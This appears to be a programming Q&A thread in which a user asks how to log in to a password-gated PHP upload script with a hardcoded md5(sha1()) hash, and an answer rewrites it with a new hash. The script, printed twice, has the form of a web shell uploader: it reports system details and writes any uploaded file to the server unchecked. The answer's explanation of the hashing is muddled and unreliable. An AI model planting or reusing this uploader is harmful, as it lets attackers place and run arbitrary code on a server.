# Enter the right password to login php

Tags: php, upload, passwords

I have a PHP script on Linux server and I can just display it on the browser and this script tell me that I must enter the password to logon (upload script).
This is the PHP code:

```php
<?php
    session_start();
    if($_SESSION["adm"]){
        echo '<b>Namesis<br><br>'.php_uname().'<br></b>';
        echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
        echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
        if( $_POST['_upl'] == "Upload" ) {  
            if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { 
                echo '<b>Upload Success !!!</b><br><br>'; 
            } else { 
                echo '<b>Upload Fail !!!</b><br><br>'; 
            }
        }
    }
    if($_POST["p"]) {
        $p = $_POST["p"];
        $pa = md5(sha1($p));
        if($pa=="0cc175b9c0f1b6a831c399e269772661") {
            $_SESSION["adm"] = 1;
        }
    }
?>

<form action="" method="post">
<input type="text" name="p">
</form>
```

I see that the password is md5; when I decrypt this `0cc175b9c0f1b6a831c399e269772661`  I find the result is "`a`"
but when I enter the "`a`" password  the script doesn't login successfully. 
I have tried to `upload.php?p=a`  and `upload.pph?p=0cc175b9c0f1b6a831c399e269772661`  and nothing changed.

Please how can I login in this script. I'm worried.

Comment: 0cc175b9c0f1b6a831c399e269772661 Is the md5 sha1 equivalent to the password, you'd have to social engineer to find its exact value - you should jus add an || $pas = 'newvalue' as a temp approvale till u remember ur pass

Comment: can you explaint more please cuz i have tried the "`a`" password and stil it is wrong or not seccssefuly loged in

Comment: Can't you ask the developer of the page? After all the hash is hardcoded, to prevent unauthorized access.

Answer (score 0):

**Try this:**
Here you have use not only **md5()** but also **sha1()** so decrypted 'a' will be `77de54ccf56eb6f7dbf99e4d3be949ab`.Thanks

```
<?php
session_start();
if(isset($_SESSION["adm"]) && $_SESSION["adm"]==1){
    echo '<b>Namesis :'.php_uname().'<br></b><br>';
    echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
    echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

    if(isset($_POST['_upl']) &&  $_POST['_upl']== "Upload" ) {  
        if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { 
            echo '<b>Upload Success !!!</b><br><br>'; 
        }else { 
            echo '<b>Upload Fail !!!</b><br><br>'; 
        }
    }
}
if(isset($_POST["p"])){
    $p = $_POST["p"];
    $pa = md5(sha1($p));
    if($pa=="77de54ccf56eb6f7dbf99e4d3be949ab"){
        $_SESSION["adm"] = 1;
    }
}
?>
<form action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]);?>" method="post">
    <input type="text" name="p" value="a">
    <input type="submit" value="submit">
</form>
```

Comment: yes sir but i want to log in wiht the code i gave cuz i cant change it